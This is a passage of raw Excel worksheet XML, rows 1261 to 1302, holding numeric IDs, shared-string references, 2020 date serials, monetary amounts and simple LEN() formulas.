      <c r="E1261">
        <v>11</v>
      </c>
      <c r="F1261" t="s">
        <v>11303</v>
      </c>
      <c r="G1261" s="1">
        <v>44102</v>
      </c>
      <c r="H1261">
        <v>50000</v>
      </c>
      <c r="I1261" t="s">
        <v>11304</v>
      </c>
      <c r="K1261">
        <f>LEN(I1261)</f>
        <v>159</v>
      </c>
      <c r="L1261">
        <f>LEN(J1261)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1262" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1262">
        <v>21226</v>
      </c>
      <c r="B1262">
        <v>681</v>
      </c>
      <c r="C1262" t="s">
        <v>1571</v>
      </c>
      <c r="D1262" t="s">
        <v>9439</v>
      </c>
      <c r="E1262">
        <v>11</v>
      </c>
      <c r="F1262" t="s">
        <v>11220</v>
      </c>
      <c r="G1262" s="1">
        <v>44015</v>
      </c>
      <c r="H1262">
        <v>300000</v>
      </c>
      <c r="I1262" t="s">
        <v>11221</v>
      </c>
      <c r="K1262">
        <f>LEN(I1262)</f>
        <v>157</v>
      </c>
      <c r="L1262">
        <f>LEN(J1262)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1263" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1263">
        <v>17300</v>
      </c>
      <c r="B1263">
        <v>2142</v>
      </c>
      <c r="C1263" t="s">
        <v>4977</v>
      </c>
      <c r="D1263" t="s">
        <v>9763</v>
      </c>
      <c r="E1263">
        <v>11</v>
      </c>
      <c r="F1263" t="s">
        <v>9595</v>
      </c>
      <c r="G1263" s="1">
        <v>43853</v>
      </c>
      <c r="H1263">
        <v>15000</v>
      </c>
      <c r="I1263" t="s">
        <v>9764</v>
      </c>
      <c r="K1263">
        <f>LEN(I1263)</f>
        <v>156</v>
      </c>
      <c r="L1263">
        <f>LEN(J1263)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1264" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1264">
        <v>17302</v>
      </c>
      <c r="B1264">
        <v>2142</v>
      </c>
      <c r="C1264" t="s">
        <v>4977</v>
      </c>
      <c r="D1264" t="s">
        <v>9763</v>
      </c>
      <c r="E1264">
        <v>11</v>
      </c>
      <c r="F1264" t="s">
        <v>9676</v>
      </c>
      <c r="G1264" s="1">
        <v>43853</v>
      </c>
      <c r="H1264">
        <v>15000</v>
      </c>
      <c r="I1264" t="s">
        <v>9764</v>
      </c>
      <c r="K1264">
        <f>LEN(I1264)</f>
        <v>156</v>
      </c>
      <c r="L1264">
        <f>LEN(J1264)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1265" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1265">
        <v>19756</v>
      </c>
      <c r="B1265">
        <v>343</v>
      </c>
      <c r="C1265" t="s">
        <v>16366</v>
      </c>
      <c r="D1265" t="s">
        <v>16367</v>
      </c>
      <c r="E1265">
        <v>12</v>
      </c>
      <c r="F1265" t="s">
        <v>10227</v>
      </c>
      <c r="G1265" s="1">
        <v>43959</v>
      </c>
      <c r="H1265" s="4">
        <v>480000</v>
      </c>
      <c r="I1265" t="s">
        <v>10228</v>
      </c>
      <c r="K1265">
        <f>LEN(I1265)</f>
        <v>154</v>
      </c>
      <c r="L1265">
        <f>LEN(J1265)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1266" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1266">
        <v>21227</v>
      </c>
      <c r="B1266">
        <v>681</v>
      </c>
      <c r="C1266" t="s">
        <v>16368</v>
      </c>
      <c r="D1266" t="s">
        <v>16369</v>
      </c>
      <c r="E1266">
        <v>11</v>
      </c>
      <c r="F1266" t="s">
        <v>8913</v>
      </c>
      <c r="G1266" s="1">
        <v>44015</v>
      </c>
      <c r="H1266" s="4">
        <v>300000</v>
      </c>
      <c r="I1266" t="s">
        <v>11222</v>
      </c>
      <c r="K1266">
        <f>LEN(I1266)</f>
        <v>145</v>
      </c>
      <c r="L1266">
        <f>LEN(J1266)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1267" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1267">
        <v>19804</v>
      </c>
      <c r="B1267">
        <v>2521</v>
      </c>
      <c r="C1267" t="s">
        <v>5362</v>
      </c>
      <c r="D1267" t="s">
        <v>10253</v>
      </c>
      <c r="E1267">
        <v>11</v>
      </c>
      <c r="F1267" t="s">
        <v>10254</v>
      </c>
      <c r="G1267" s="1">
        <v>43888</v>
      </c>
      <c r="H1267">
        <v>2400</v>
      </c>
      <c r="I1267" t="s">
        <v>10255</v>
      </c>
      <c r="K1267">
        <f>LEN(I1267)</f>
        <v>141</v>
      </c>
      <c r="L1267">
        <f>LEN(J1267)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1268" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1268">
        <v>21380</v>
      </c>
      <c r="B1268">
        <v>2205</v>
      </c>
      <c r="C1268" t="s">
        <v>5834</v>
      </c>
      <c r="D1268" t="s">
        <v>10691</v>
      </c>
      <c r="E1268">
        <v>14</v>
      </c>
      <c r="F1268" t="s">
        <v>8496</v>
      </c>
      <c r="G1268" s="1">
        <v>44070</v>
      </c>
      <c r="H1268">
        <v>288</v>
      </c>
      <c r="I1268" t="s">
        <v>11348</v>
      </c>
      <c r="K1268">
        <f>LEN(I1268)</f>
        <v>141</v>
      </c>
      <c r="L1268">
        <f>LEN(J1268)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1269" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1269">
        <v>19553</v>
      </c>
      <c r="B1269">
        <v>2282</v>
      </c>
      <c r="C1269" t="s">
        <v>5182</v>
      </c>
      <c r="D1269" t="s">
        <v>10093</v>
      </c>
      <c r="E1269">
        <v>2</v>
      </c>
      <c r="F1269" t="s">
        <v>8295</v>
      </c>
      <c r="G1269" s="1">
        <v>43861</v>
      </c>
      <c r="H1269">
        <v>2000000</v>
      </c>
      <c r="I1269" t="s">
        <v>10094</v>
      </c>
      <c r="K1269">
        <f>LEN(I1269)</f>
        <v>140</v>
      </c>
      <c r="L1269">
        <f>LEN(J1269)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1270" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1270">
        <v>21381</v>
      </c>
      <c r="B1270">
        <v>2205</v>
      </c>
      <c r="C1270" t="s">
        <v>5834</v>
      </c>
      <c r="D1270" t="s">
        <v>10691</v>
      </c>
      <c r="E1270">
        <v>14</v>
      </c>
      <c r="F1270" t="s">
        <v>11349</v>
      </c>
      <c r="G1270" s="1">
        <v>44070</v>
      </c>
      <c r="H1270">
        <v>288</v>
      </c>
      <c r="I1270" t="s">
        <v>11350</v>
      </c>
      <c r="K1270">
        <f>LEN(I1270)</f>
        <v>139</v>
      </c>
      <c r="L1270">
        <f>LEN(J1270)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1271" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1271">
        <v>21383</v>
      </c>
      <c r="B1271">
        <v>2205</v>
      </c>
      <c r="C1271" t="s">
        <v>5834</v>
      </c>
      <c r="D1271" t="s">
        <v>10691</v>
      </c>
      <c r="E1271">
        <v>14</v>
      </c>
      <c r="F1271" t="s">
        <v>11353</v>
      </c>
      <c r="G1271" s="1">
        <v>44070</v>
      </c>
      <c r="H1271">
        <v>288</v>
      </c>
      <c r="I1271" t="s">
        <v>11350</v>
      </c>
      <c r="K1271">
        <f>LEN(I1271)</f>
        <v>139</v>
      </c>
      <c r="L1271">
        <f>LEN(J1271)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1272" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1272">
        <v>21388</v>
      </c>
      <c r="B1272">
        <v>4782</v>
      </c>
      <c r="C1272" t="s">
        <v>7163</v>
      </c>
      <c r="D1272" t="s">
        <v>11354</v>
      </c>
      <c r="E1272">
        <v>15</v>
      </c>
      <c r="F1272" t="s">
        <v>11360</v>
      </c>
      <c r="G1272" s="1">
        <v>44071</v>
      </c>
      <c r="H1272">
        <v>4800</v>
      </c>
      <c r="I1272" t="s">
        <v>11361</v>
      </c>
      <c r="K1272">
        <f>LEN(I1272)</f>
        <v>136</v>
      </c>
      <c r="L1272">
        <f>LEN(J1272)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1273" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1273">
        <v>20071</v>
      </c>
      <c r="B1273">
        <v>290</v>
      </c>
      <c r="C1273" t="s">
        <v>98</v>
      </c>
      <c r="D1273" t="s">
        <v>10292</v>
      </c>
      <c r="E1273">
        <v>12</v>
      </c>
      <c r="F1273" t="s">
        <v>10456</v>
      </c>
      <c r="G1273" s="1">
        <v>43892</v>
      </c>
      <c r="H1273">
        <v>60</v>
      </c>
      <c r="I1273" t="s">
        <v>10457</v>
      </c>
      <c r="K1273">
        <f>LEN(I1273)</f>
        <v>134</v>
      </c>
      <c r="L1273">
        <f>LEN(J1273)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1274" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1274">
        <v>20073</v>
      </c>
      <c r="B1274">
        <v>290</v>
      </c>
      <c r="C1274" t="s">
        <v>98</v>
      </c>
      <c r="D1274" t="s">
        <v>10292</v>
      </c>
      <c r="E1274">
        <v>12</v>
      </c>
      <c r="F1274" t="s">
        <v>9900</v>
      </c>
      <c r="G1274" s="1">
        <v>43892</v>
      </c>
      <c r="H1274">
        <v>100</v>
      </c>
      <c r="I1274" t="s">
        <v>10457</v>
      </c>
      <c r="K1274">
        <f>LEN(I1274)</f>
        <v>134</v>
      </c>
      <c r="L1274">
        <f>LEN(J1274)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1275" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1275">
        <v>19244</v>
      </c>
      <c r="B1275">
        <v>2318</v>
      </c>
      <c r="C1275" t="s">
        <v>4787</v>
      </c>
      <c r="D1275" t="s">
        <v>9864</v>
      </c>
      <c r="E1275">
        <v>15</v>
      </c>
      <c r="F1275" t="s">
        <v>3341</v>
      </c>
      <c r="G1275" s="1">
        <v>44090</v>
      </c>
      <c r="H1275">
        <v>80</v>
      </c>
      <c r="I1275" t="s">
        <v>9865</v>
      </c>
      <c r="K1275">
        <f>LEN(I1275)</f>
        <v>131</v>
      </c>
      <c r="L1275">
        <f>LEN(J1275)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1276" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1276">
        <v>17014</v>
      </c>
      <c r="B1276">
        <v>2342</v>
      </c>
      <c r="C1276" t="s">
        <v>6840</v>
      </c>
      <c r="D1276" t="s">
        <v>9619</v>
      </c>
      <c r="E1276">
        <v>16</v>
      </c>
      <c r="F1276" t="s">
        <v>9620</v>
      </c>
      <c r="G1276" s="1">
        <v>43908</v>
      </c>
      <c r="H1276">
        <v>12000</v>
      </c>
      <c r="I1276" t="s">
        <v>9621</v>
      </c>
      <c r="K1276">
        <f>LEN(I1276)</f>
        <v>121</v>
      </c>
      <c r="L1276">
        <f>LEN(J1276)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1277" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1277">
        <v>19555</v>
      </c>
      <c r="B1277">
        <v>2282</v>
      </c>
      <c r="C1277" t="s">
        <v>5182</v>
      </c>
      <c r="D1277" t="s">
        <v>10093</v>
      </c>
      <c r="E1277">
        <v>2</v>
      </c>
      <c r="F1277" t="s">
        <v>10097</v>
      </c>
      <c r="G1277" s="1">
        <v>43861</v>
      </c>
      <c r="H1277">
        <v>300000</v>
      </c>
      <c r="I1277" t="s">
        <v>10098</v>
      </c>
      <c r="K1277">
        <f>LEN(I1277)</f>
        <v>117</v>
      </c>
      <c r="L1277">
        <f>LEN(J1277)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1278" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1278">
        <v>19793</v>
      </c>
      <c r="B1278">
        <v>2558</v>
      </c>
      <c r="C1278" t="s">
        <v>4971</v>
      </c>
      <c r="D1278" t="s">
        <v>10236</v>
      </c>
      <c r="E1278">
        <v>12</v>
      </c>
      <c r="F1278" t="s">
        <v>10237</v>
      </c>
      <c r="G1278" s="1">
        <v>43868</v>
      </c>
      <c r="H1278">
        <v>90000</v>
      </c>
      <c r="I1278" t="s">
        <v>10238</v>
      </c>
      <c r="K1278">
        <f>LEN(I1278)</f>
        <v>115</v>
      </c>
      <c r="L1278">
        <f>LEN(J1278)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1279" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1279">
        <v>21136</v>
      </c>
      <c r="B1279">
        <v>2361</v>
      </c>
      <c r="C1279" t="s">
        <v>4926</v>
      </c>
      <c r="D1279" t="s">
        <v>11164</v>
      </c>
      <c r="E1279">
        <v>16</v>
      </c>
      <c r="F1279" t="s">
        <v>2236</v>
      </c>
      <c r="G1279" s="1">
        <v>44071</v>
      </c>
      <c r="H1279">
        <v>80000</v>
      </c>
      <c r="I1279" t="s">
        <v>11165</v>
      </c>
      <c r="K1279">
        <f>LEN(I1279)</f>
        <v>113</v>
      </c>
      <c r="L1279">
        <f>LEN(J1279)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1280" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1280">
        <v>19260</v>
      </c>
      <c r="B1280">
        <v>433</v>
      </c>
      <c r="C1280" t="s">
        <v>206</v>
      </c>
      <c r="D1280" t="s">
        <v>9878</v>
      </c>
      <c r="E1280">
        <v>16</v>
      </c>
      <c r="F1280" t="s">
        <v>9883</v>
      </c>
      <c r="G1280" s="1">
        <v>43929</v>
      </c>
      <c r="H1280">
        <v>15000</v>
      </c>
      <c r="I1280" t="s">
        <v>9884</v>
      </c>
      <c r="K1280">
        <f>LEN(I1280)</f>
        <v>111</v>
      </c>
      <c r="L1280">
        <f>LEN(J1280)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1281" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1281">
        <v>19978</v>
      </c>
      <c r="B1281">
        <v>1490</v>
      </c>
      <c r="C1281" t="s">
        <v>16370</v>
      </c>
      <c r="D1281" t="s">
        <v>16371</v>
      </c>
      <c r="E1281">
        <v>33</v>
      </c>
      <c r="F1281" t="s">
        <v>10368</v>
      </c>
      <c r="G1281" s="1">
        <v>43990</v>
      </c>
      <c r="H1281">
        <v>81195.7</v>
      </c>
      <c r="I1281" t="s">
        <v>10369</v>
      </c>
      <c r="K1281">
        <f>LEN(I1281)</f>
        <v>110</v>
      </c>
      <c r="L1281">
        <f>LEN(J1281)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1282" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1282">
        <v>16847</v>
      </c>
      <c r="B1282">
        <v>1237</v>
      </c>
      <c r="C1282" t="s">
        <v>2481</v>
      </c>
      <c r="D1282" t="s">
        <v>9513</v>
      </c>
      <c r="E1282">
        <v>16</v>
      </c>
      <c r="F1282" t="s">
        <v>9514</v>
      </c>
      <c r="G1282" s="1">
        <v>43938</v>
      </c>
      <c r="H1282">
        <v>5000</v>
      </c>
      <c r="I1282" t="s">
        <v>9515</v>
      </c>
      <c r="K1282">
        <f>LEN(I1282)</f>
        <v>109</v>
      </c>
      <c r="L1282">
        <f>LEN(J1282)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1283" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1283">
        <v>20683</v>
      </c>
      <c r="B1283">
        <v>840</v>
      </c>
      <c r="C1283" t="s">
        <v>3030</v>
      </c>
      <c r="D1283" t="s">
        <v>10880</v>
      </c>
      <c r="E1283">
        <v>16</v>
      </c>
      <c r="F1283" t="s">
        <v>10881</v>
      </c>
      <c r="G1283" s="1">
        <v>44084</v>
      </c>
      <c r="H1283">
        <v>12000</v>
      </c>
      <c r="I1283" t="s">
        <v>10882</v>
      </c>
      <c r="K1283">
        <f>LEN(I1283)</f>
        <v>103</v>
      </c>
      <c r="L1283">
        <f>LEN(J1283)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1284" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1284">
        <v>19428</v>
      </c>
      <c r="B1284">
        <v>358</v>
      </c>
      <c r="C1284" t="s">
        <v>401</v>
      </c>
      <c r="D1284" t="s">
        <v>10027</v>
      </c>
      <c r="E1284">
        <v>12</v>
      </c>
      <c r="F1284" t="s">
        <v>10030</v>
      </c>
      <c r="G1284" s="1">
        <v>43917</v>
      </c>
      <c r="H1284">
        <v>300000</v>
      </c>
      <c r="I1284" t="s">
        <v>10031</v>
      </c>
      <c r="K1284">
        <f>LEN(I1284)</f>
        <v>100</v>
      </c>
      <c r="L1284">
        <f>LEN(J1284)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1285" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1285">
        <v>19445</v>
      </c>
      <c r="B1285">
        <v>423</v>
      </c>
      <c r="C1285" t="s">
        <v>16372</v>
      </c>
      <c r="D1285" t="s">
        <v>16373</v>
      </c>
      <c r="E1285">
        <v>13</v>
      </c>
      <c r="F1285" t="s">
        <v>9577</v>
      </c>
      <c r="G1285" s="1">
        <v>43929</v>
      </c>
      <c r="H1285">
        <v>2146.7800000000002</v>
      </c>
      <c r="I1285" t="s">
        <v>10031</v>
      </c>
      <c r="K1285">
        <f>LEN(I1285)</f>
        <v>100</v>
      </c>
      <c r="L1285">
        <f>LEN(J1285)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1286" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1286">
        <v>19878</v>
      </c>
      <c r="B1286">
        <v>423</v>
      </c>
      <c r="C1286" t="s">
        <v>16372</v>
      </c>
      <c r="D1286" t="s">
        <v>16373</v>
      </c>
      <c r="E1286">
        <v>13</v>
      </c>
      <c r="F1286" t="s">
        <v>10299</v>
      </c>
      <c r="G1286" s="1">
        <v>43929</v>
      </c>
      <c r="H1286">
        <v>4813.6400000000003</v>
      </c>
      <c r="I1286" t="s">
        <v>10031</v>
      </c>
      <c r="K1286">
        <f>LEN(I1286)</f>
        <v>100</v>
      </c>
      <c r="L1286">
        <f>LEN(J1286)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1287" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1287">
        <v>19879</v>
      </c>
      <c r="B1287">
        <v>423</v>
      </c>
      <c r="C1287" t="s">
        <v>167</v>
      </c>
      <c r="D1287" t="s">
        <v>10046</v>
      </c>
      <c r="E1287">
        <v>13</v>
      </c>
      <c r="F1287" t="s">
        <v>10300</v>
      </c>
      <c r="G1287" s="1">
        <v>43929</v>
      </c>
      <c r="H1287">
        <v>5231</v>
      </c>
      <c r="I1287" t="s">
        <v>10031</v>
      </c>
      <c r="K1287">
        <f>LEN(I1287)</f>
        <v>100</v>
      </c>
      <c r="L1287">
        <f>LEN(J1287)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1288" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1288">
        <v>19880</v>
      </c>
      <c r="B1288">
        <v>423</v>
      </c>
      <c r="C1288" t="s">
        <v>16372</v>
      </c>
      <c r="D1288" t="s">
        <v>16373</v>
      </c>
      <c r="E1288">
        <v>13</v>
      </c>
      <c r="F1288" t="s">
        <v>10301</v>
      </c>
      <c r="G1288" s="1">
        <v>43929</v>
      </c>
      <c r="H1288">
        <v>2554.75</v>
      </c>
      <c r="I1288" t="s">
        <v>10031</v>
      </c>
      <c r="K1288">
        <f>LEN(I1288)</f>
        <v>100</v>
      </c>
      <c r="L1288">
        <f>LEN(J1288)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1289" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1289">
        <v>19881</v>
      </c>
      <c r="B1289">
        <v>423</v>
      </c>
      <c r="C1289" t="s">
        <v>167</v>
      </c>
      <c r="D1289" t="s">
        <v>10046</v>
      </c>
      <c r="E1289">
        <v>13</v>
      </c>
      <c r="F1289" t="s">
        <v>10302</v>
      </c>
      <c r="G1289" s="1">
        <v>43929</v>
      </c>
      <c r="H1289">
        <v>1200</v>
      </c>
      <c r="I1289" t="s">
        <v>10031</v>
      </c>
      <c r="K1289">
        <f>LEN(I1289)</f>
        <v>100</v>
      </c>
      <c r="L1289">
        <f>LEN(J1289)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1290" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1290">
        <v>19882</v>
      </c>
      <c r="B1290">
        <v>423</v>
      </c>
      <c r="C1290" t="s">
        <v>167</v>
      </c>
      <c r="D1290" t="s">
        <v>10046</v>
      </c>
      <c r="E1290">
        <v>13</v>
      </c>
      <c r="F1290" t="s">
        <v>9435</v>
      </c>
      <c r="G1290" s="1">
        <v>43929</v>
      </c>
      <c r="H1290">
        <v>1200</v>
      </c>
      <c r="I1290" t="s">
        <v>10031</v>
      </c>
      <c r="K1290">
        <f>LEN(I1290)</f>
        <v>100</v>
      </c>
      <c r="L1290">
        <f>LEN(J1290)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1291" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1291">
        <v>19884</v>
      </c>
      <c r="B1291">
        <v>423</v>
      </c>
      <c r="C1291" t="s">
        <v>167</v>
      </c>
      <c r="D1291" t="s">
        <v>10046</v>
      </c>
      <c r="E1291">
        <v>13</v>
      </c>
      <c r="F1291" t="s">
        <v>10303</v>
      </c>
      <c r="G1291" s="1">
        <v>43929</v>
      </c>
      <c r="H1291">
        <v>2200</v>
      </c>
      <c r="I1291" t="s">
        <v>10031</v>
      </c>
      <c r="K1291">
        <f>LEN(I1291)</f>
        <v>100</v>
      </c>
      <c r="L1291">
        <f>LEN(J1291)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1292" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1292">
        <v>19885</v>
      </c>
      <c r="B1292">
        <v>423</v>
      </c>
      <c r="C1292" t="s">
        <v>167</v>
      </c>
      <c r="D1292" t="s">
        <v>10046</v>
      </c>
      <c r="E1292">
        <v>13</v>
      </c>
      <c r="F1292" t="s">
        <v>10304</v>
      </c>
      <c r="G1292" s="1">
        <v>43929</v>
      </c>
      <c r="H1292">
        <v>58</v>
      </c>
      <c r="I1292" t="s">
        <v>10031</v>
      </c>
      <c r="K1292">
        <f>LEN(I1292)</f>
        <v>100</v>
      </c>
      <c r="L1292">
        <f>LEN(J1292)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1293" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1293">
        <v>19886</v>
      </c>
      <c r="B1293">
        <v>423</v>
      </c>
      <c r="C1293" t="s">
        <v>167</v>
      </c>
      <c r="D1293" t="s">
        <v>10046</v>
      </c>
      <c r="E1293">
        <v>13</v>
      </c>
      <c r="F1293" t="s">
        <v>9610</v>
      </c>
      <c r="G1293" s="1">
        <v>43929</v>
      </c>
      <c r="H1293">
        <v>175</v>
      </c>
      <c r="I1293" t="s">
        <v>10031</v>
      </c>
      <c r="K1293">
        <f>LEN(I1293)</f>
        <v>100</v>
      </c>
      <c r="L1293">
        <f>LEN(J1293)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1294" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1294">
        <v>19887</v>
      </c>
      <c r="B1294">
        <v>423</v>
      </c>
      <c r="C1294" t="s">
        <v>16372</v>
      </c>
      <c r="D1294" t="s">
        <v>16373</v>
      </c>
      <c r="E1294">
        <v>13</v>
      </c>
      <c r="F1294" t="s">
        <v>10305</v>
      </c>
      <c r="G1294" s="1">
        <v>43929</v>
      </c>
      <c r="H1294" s="3" t="s">
        <v>16240</v>
      </c>
      <c r="I1294" t="s">
        <v>10031</v>
      </c>
      <c r="K1294">
        <f>LEN(I1294)</f>
        <v>100</v>
      </c>
      <c r="L1294">
        <f>LEN(J1294)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1295" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1295">
        <v>19888</v>
      </c>
      <c r="B1295">
        <v>423</v>
      </c>
      <c r="C1295" t="s">
        <v>16372</v>
      </c>
      <c r="D1295" t="s">
        <v>16373</v>
      </c>
      <c r="E1295">
        <v>13</v>
      </c>
      <c r="F1295" t="s">
        <v>10306</v>
      </c>
      <c r="G1295" s="1">
        <v>43929</v>
      </c>
      <c r="H1295" s="3" t="s">
        <v>16241</v>
      </c>
      <c r="I1295" t="s">
        <v>10031</v>
      </c>
      <c r="K1295">
        <f>LEN(I1295)</f>
        <v>100</v>
      </c>
      <c r="L1295">
        <f>LEN(J1295)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1296" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1296">
        <v>19889</v>
      </c>
      <c r="B1296">
        <v>423</v>
      </c>
      <c r="C1296" t="s">
        <v>16372</v>
      </c>
      <c r="D1296" t="s">
        <v>16373</v>
      </c>
      <c r="E1296">
        <v>13</v>
      </c>
      <c r="F1296" t="s">
        <v>9430</v>
      </c>
      <c r="G1296" s="1">
        <v>43929</v>
      </c>
      <c r="H1296" s="3" t="s">
        <v>16242</v>
      </c>
      <c r="I1296" t="s">
        <v>10031</v>
      </c>
      <c r="K1296">
        <f>LEN(I1296)</f>
        <v>100</v>
      </c>
      <c r="L1296">
        <f>LEN(J1296)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1297" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1297">
        <v>19890</v>
      </c>
      <c r="B1297">
        <v>423</v>
      </c>
      <c r="C1297" t="s">
        <v>16372</v>
      </c>
      <c r="D1297" t="s">
        <v>16373</v>
      </c>
      <c r="E1297">
        <v>13</v>
      </c>
      <c r="F1297" t="s">
        <v>4686</v>
      </c>
      <c r="G1297" s="1">
        <v>43929</v>
      </c>
      <c r="H1297">
        <v>866.96</v>
      </c>
      <c r="I1297" t="s">
        <v>10031</v>
      </c>
      <c r="K1297">
        <f>LEN(I1297)</f>
        <v>100</v>
      </c>
      <c r="L1297">
        <f>LEN(J1297)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1298" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1298">
        <v>19891</v>
      </c>
      <c r="B1298">
        <v>423</v>
      </c>
      <c r="C1298" t="s">
        <v>16372</v>
      </c>
      <c r="D1298" t="s">
        <v>16373</v>
      </c>
      <c r="E1298">
        <v>13</v>
      </c>
      <c r="F1298" t="s">
        <v>2236</v>
      </c>
      <c r="G1298" s="1">
        <v>43929</v>
      </c>
      <c r="H1298" s="3" t="s">
        <v>16243</v>
      </c>
      <c r="I1298" t="s">
        <v>10031</v>
      </c>
      <c r="K1298">
        <f>LEN(I1298)</f>
        <v>100</v>
      </c>
      <c r="L1298">
        <f>LEN(J1298)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1299" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1299">
        <v>19892</v>
      </c>
      <c r="B1299">
        <v>423</v>
      </c>
      <c r="C1299" t="s">
        <v>16372</v>
      </c>
      <c r="D1299" t="s">
        <v>16373</v>
      </c>
      <c r="E1299">
        <v>13</v>
      </c>
      <c r="F1299" t="s">
        <v>10307</v>
      </c>
      <c r="G1299" s="1">
        <v>43929</v>
      </c>
      <c r="H1299" s="3" t="s">
        <v>16244</v>
      </c>
      <c r="I1299" t="s">
        <v>10031</v>
      </c>
      <c r="K1299">
        <f>LEN(I1299)</f>
        <v>100</v>
      </c>
      <c r="L1299">
        <f>LEN(J1299)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1300" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1300">
        <v>19893</v>
      </c>
      <c r="B1300">
        <v>423</v>
      </c>
      <c r="C1300" t="s">
        <v>167</v>
      </c>
      <c r="D1300" t="s">
        <v>10046</v>
      </c>
      <c r="E1300">
        <v>13</v>
      </c>
      <c r="F1300" t="s">
        <v>10308</v>
      </c>
      <c r="G1300" s="1">
        <v>43929</v>
      </c>
      <c r="H1300">
        <v>2200</v>
      </c>
      <c r="I1300" t="s">
        <v>10031</v>
      </c>
      <c r="K1300">
        <f>LEN(I1300)</f>
        <v>100</v>
      </c>
      <c r="L1300">
        <f>LEN(J1300)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1301" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1301">
        <v>19894</v>
      </c>
      <c r="B1301">
        <v>423</v>
      </c>
      <c r="C1301" t="s">
        <v>167</v>
      </c>
      <c r="D1301" t="s">
        <v>10046</v>
      </c>
      <c r="E1301">
        <v>13</v>
      </c>
      <c r="F1301" t="s">
        <v>2924</v>
      </c>
      <c r="G1301" s="1">
        <v>43929</v>
      </c>
      <c r="H1301">
        <v>197735</v>
      </c>
      <c r="I1301" t="s">
        <v>10031</v>
      </c>
      <c r="K1301">
        <f>LEN(I1301)</f>
        <v>100</v>
      </c>
      <c r="L1301">
        <f>LEN(J1301)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1302" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1302">
        <v>19895</v>
      </c>
      <c r="B1302">
        <v>423</v>
      </c>
      <c r="C1302" t="s">
        <v>167</v>
      </c>
      <c r="D1302" t="s">
        <v>10046</v>
      </c>
      <c r="E1302">
        <v>13</v>
      </c>
      <c r="F1302" t="s">
        <v>9438</v>
      </c>
      <c r="G1302" s="1">
        <v>43929</v>
      </c>
      <c r="H1302">
        <v>197735</v>
      </c>
      <c r="I1302" t="s">
        <v>10031</v>
      </c>
      <c r="K1302">
        <f>LEN(I1302)</f>
        <v>100</v>
      </c>
      <c r="L1302">
        <f>LEN(J1302)</f>
        <v>0</v>
      </c>
    </row>
